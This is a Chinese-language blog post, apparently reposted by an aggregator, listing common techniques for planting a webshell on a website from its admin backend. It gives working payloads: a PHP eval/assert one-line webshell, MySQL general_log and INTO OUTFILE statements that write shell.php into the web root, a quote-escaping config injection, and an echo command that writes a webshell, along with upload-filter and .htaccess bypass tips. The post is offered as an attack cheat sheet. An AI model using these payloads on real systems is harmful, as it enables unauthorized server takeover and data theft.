后台getshell常用技巧总结
1.利用文件上傳漏洞,找文件上傳處想辦法上傳php文件。
一些網(wǎng)站在設(shè)置可以允許修改上傳的文件類型則直接添加php
有時(shí)候會(huì)還有檢測(cè)是否為php文件,可以通過(guò)文件名變形,大小寫,雙寫等形式繞過(guò),只要是黑名單的都比較好繞過(guò)。
很多cms還有.htaccess文件禁止訪問(wèn)或者執(zhí)行這個(gè)目錄下的文件的情況。
這種情況直接上傳一個(gè).htaccess文件覆蓋這個(gè),讓其失效。
或者上傳不重命名的話,上傳../../shell.php,傳到其他不被限制訪問(wèn)的目錄。
或者找任意文件刪除漏洞把.htaccess文件刪除。
2.找文件配置的地方寫入php代碼,一般都有過(guò)濾的,想辦法繞過(guò)。
過(guò)濾單引號(hào)的話可以用注釋把上一個(gè)的內(nèi)容注釋掉,在下一個(gè)參數(shù)配置注入代碼。
效果如下:
$conf_1 = 'xx\'; $conf_2 = ';phpinfo();//'這樣就相當(dāng)于
$conf_1 = 'xx\';$conf_2 = '; phpinfo();php代碼就可以執(zhí)行了,防護(hù)比較弱的話直接訪問(wèn)這個(gè)配置文件就可以getshell了。
防護(hù)比較好的禁止訪問(wèn)配置文件時(shí),就找包含這個(gè)配置文件的文件即可。
3.找有沒(méi)有存在任意文件包含的地方,本地包含的話直接上傳php代碼的圖片,遠(yuǎn)程包含的話就在自己的服務(wù)器上設(shè)置php代碼文件。
4.sql注入getshell,要知道網(wǎng)站的絕對(duì)路徑
方法一:利用設(shè)置mysql log為php文件,并設(shè)置路徑到網(wǎng)站目錄下,這樣就可以把sql中執(zhí)行的php語(yǔ)句插入的log中了。
如:
SETglobal general_log='on'; SETglobalgeneral_log_file='D:/webshell/WWW/shell.php';#如果沒(méi)有shell.php會(huì)自動(dòng)創(chuàng)建
SELECT'<?php assert($_POST["cmd"]);?>';方法二:
select "<?php phpinfo(); ?>" into outfile 'shell路徑.php'5.遠(yuǎn)程圖片文件下載
有時(shí)候遠(yuǎn)程圖片下載的時(shí)候,可以設(shè)置一下下載自己的php文件
如 自己服務(wù)器上的文件1.php
<?php echo "<?php phpinfo(); ?>"; ?>或者別的方式,讓頁(yè)面有php代碼,如果不過(guò)濾后綴的話直接會(huì)下載這個(gè)php文件。
6.zip解壓getshell
這個(gè)在系統(tǒng)升級(jí)或者插件安裝的地方很多都有這個(gè)問(wèn)題。上傳shell.php在壓縮包中,上傳系統(tǒng)升級(jí)時(shí)會(huì)解壓縮,那么就可以getshell
7.緩存寫入
有些地方會(huì)把緩存寫入到一個(gè)php文件里,想辦法讓自己的payload寫入緩存中。
8.數(shù)據(jù)庫(kù)備份getshell
有些提供功能可以通過(guò)數(shù)據(jù)庫(kù)備份進(jìn)行修改文件后綴。
9.編輯模板getshell
在網(wǎng)站編輯模板插入一句話。
10.命令執(zhí)行拿webshell
echo <?php @eval($_POST(a));?> >路徑.php
可以用相對(duì)路徑也可以用絕對(duì)路徑
11.編輯器漏洞getshell
要留意cms使用的編輯器版本是否是已知漏洞的版本
12.利用文件解析漏洞拿webshell
13.找可以執(zhí)行代碼的函數(shù),看看參數(shù)是否可控
14.找寫文件的函數(shù),看看文件后綴和內(nèi)容是否可控
15,. 沒(méi)有進(jìn)入后臺(tái)
0day拿webshell
IIS寫權(quán)限拿webshell(put一個(gè)shell進(jìn)去)
命令執(zhí)行拿webshell
通過(guò)注入漏洞拿webshell
前臺(tái)圖片上傳拿webshell
Structs2拿webshell
java反序列拿webshell
?
總結(jié)
以上是生活随笔為你收集整理的后台getshell常用技巧总结的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 悬剑武器库之5种工具学习(shiro检测
- 下一篇: haproxy透传用户ip-方法和原理